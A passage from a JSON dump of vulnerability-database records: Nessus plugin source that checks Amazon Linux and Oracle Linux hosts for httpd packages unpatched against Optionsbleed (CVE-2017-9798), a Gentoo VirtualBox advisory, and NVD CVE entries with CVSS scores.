"https://www.tenable.com/plugins/nessus/103309", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-896.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103309);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/04/10 16:10:16\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"ALAS\", value:\"2017-896\");\n\n script_name(english:\"Amazon Linux AMI : httpd24 / httpd (ALAS-2017-896) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Apache httpd allows remote attackers to read secret data from process\nmemory if the Limit directive can be set in a user's .htaccess file,\nor if httpd.conf has certain misconfigurations, aka Optionsbleed. The\nattacker sends an unauthenticated OPTIONS HTTP request when attempting\nto read secret data. This is a use-after-free issue and thus secret\ndata is not always sent, and the specific data depends on many factors\nincluding configuration.(CVE-2017-9798)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-896.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update httpd24' to update your system.\n\nRun 'yum update httpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.34-1.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.34-1.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.34-1.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.34-1.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.34-1.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-debuginfo-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-devel-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-manual-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-tools-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_ldap-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_proxy_html-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_session-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_ssl-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.34-1.15.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T12:51:49", "description": "From Red Hat Security Advisory 2017:2882 :\n\nAn update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* A use-after-free flaw was found in the way httpd handled invalid and\npreviously unregistered HTTP methods specified in the Limit directive\nused in an .htaccess file. A remote attacker could possibly use this\nflaw to disclose portions of the server memory, or cause httpd child\nprocess to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno Bock for reporting this issue.", "edition": 26, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-10-12T00:00:00", "title": "Oracle Linux 7 : httpd (ELSA-2017-2882) (Optionsbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798"], "modified": "2017-10-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd", "p-cpe:/a:oracle:linux:mod_session", "p-cpe:/a:oracle:linux:mod_ssl", "p-cpe:/a:oracle:linux:httpd-manual", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:mod_ldap", "p-cpe:/a:oracle:linux:httpd-tools", "p-cpe:/a:oracle:linux:mod_proxy_html"], "id": "ORACLELINUX_ELSA-2017-2882.NASL", "href": "https://www.tenable.com/plugins/nessus/103803", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:2882 and \n# Oracle Linux Security Advisory ELSA-2017-2882 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103803);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"RHSA\", value:\"2017:2882\");\n\n script_name(english:\"Oracle Linux 7 : httpd (ELSA-2017-2882) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:2882 :\n\nAn update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* A use-after-free flaw was found in the way httpd handled invalid and\npreviously unregistered HTTP methods specified in the Limit directive\nused in an .htaccess file. A remote attacker could possibly use this\nflaw to disclose portions of the server memory, or cause httpd child\nprocess to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno Bock for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-October/007263.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/12\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"httpd-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"httpd-devel-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"httpd-manual-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"httpd-tools-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"mod_ldap-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"mod_proxy_html-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"mod_session-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"mod_ssl-2.4.6-67.0.1.el7_4.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / mod_ldap / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "gentoo": [{"lastseen": "2018-05-23T03:03:47", "bulletinFamily": "unix", "cvelist": ["CVE-2018-2836", "CVE-2018-2860", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2845", "CVE-2018-2837", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2843"], "description": "### Background\n\nVirtualBox is a powerful virtualization product from Oracle.\n\n### Description\n\nMultiple vulnerabilities have been discovered in VirtualBox. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nAn attacker could take control of VirtualBox resulting in the execution of arbitrary code with the privileges of the process, a Denial of Service condition, or other unspecified impacts. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll VirtualBox users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-emulation/virtualbox-5.1.36\"\n \n\nAll VirtualBox binary users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=app-emulation/virtualbox-bin-5.1.36.122089\"", "edition": 1, "modified": "2018-05-22T00:00:00", "published": "2018-05-22T00:00:00", "id": "GLSA-201805-08", "href": "https://security.gentoo.org/glsa/201805-08", "title": "VirtualBox: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2020-12-09T20:25:41", "description": "Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.1.36 and Prior to 5.2.10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.0 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).", "edition": 6, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-04-19T02:29:00", "title": "CVE-2018-2844", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2844"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-2844", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2844", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:41", "description": "Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.1.36 and Prior to 5.2.10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox as well as unauthorized update, insert or delete access to some of Oracle VM VirtualBox accessible data and unauthorized read access to a subset of Oracle VM VirtualBox accessible data. CVSS 3.0 Base Score 6.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H).", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "baseScore": 6.6, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.7}, "published": "2018-04-19T02:29:00", "title": "CVE-2018-2845", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2845"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-2845", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2845", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T20:13:39", "description": "Apache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. This affects the Apache HTTP Server through 2.2.34 and 2.4.x through 2.4.27. The attacker sends an unauthenticated OPTIONS HTTP request when attempting to read secret data. This is a use-after-free issue and thus secret data is not always sent, and the specific data depends on many factors including configuration. Exploitation with .htaccess can be blocked with a patch to the ap_limit_section function in server/core.c.", "edition": 10, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2017-09-18T15:29:00", "title": "CVE-2017-9798", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9798"], "modified": "2020-10-15T16:12:00", "cpe": ["cpe:/a:apache:http_server:2.4.12", "cpe:/a:apache:http_server:2.4.1", "cpe:/a:apache:http_server:2.4.17", "cpe:/a:apache:http_server:2.4.20", "cpe:/a:apache:http_server:2.4.18", "cpe:/a:apache:http_server:2.4.10", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:apache:http_server:2.4.2", "cpe:/a:apache:http_server:2.4.3", "cpe:/a:apache:http_server:2.4.26", "cpe:/a:apache:http_server:2.4.9", "cpe:/a:apache:http_server:2.4.6", "cpe:/a:apache:http_server:2.2.34", "cpe:/a:apache:http_server:2.4.16", "cpe:/a:apache:http_server:2.4.27", "cpe:/a:apache:http_server:2.4.23", "cpe:/a:apache:http_server:2.4.7", "cpe:/a:apache:http_server:2.4.4", "cpe:/a:apache:http_server:2.4.25", "cpe:/o:debian:debian_linux:7.0", "cpe:/a:apache:http_server:2.4.0", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-9798", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9798", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.34:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.25:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:25:41", "description": "Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.1.36 and Prior to 5.2.10. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.0 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H).", "edition": 6, "cvss3": {"exploitabilityScore": 1.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-04-19T02:29:00", "title": "CVE-2018-2860", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2860"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-2860", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2860", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:41", "description": "Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.1.36 and Prior to 5.2.10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.0 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).", "edition": 6, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-04-19T02:29:00", "title": "CVE-2018-2843", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 